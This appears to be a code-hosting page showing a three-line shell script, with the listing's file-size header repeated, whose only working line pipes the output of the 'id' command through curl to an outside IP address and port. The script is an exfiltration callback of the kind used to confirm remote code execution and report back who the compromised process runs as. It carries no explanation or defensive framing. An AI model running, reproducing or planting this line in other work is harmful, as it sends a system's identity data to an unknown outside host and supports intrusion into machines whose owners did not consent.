3 lines
80 B
Bash
3 lines
80 B
Bash
|
|
#!/bin/sh
|
||
|
|
id 2>&1 | curl -s -m 5 --data-binary @- http://202.79.169.91:28016/r1
|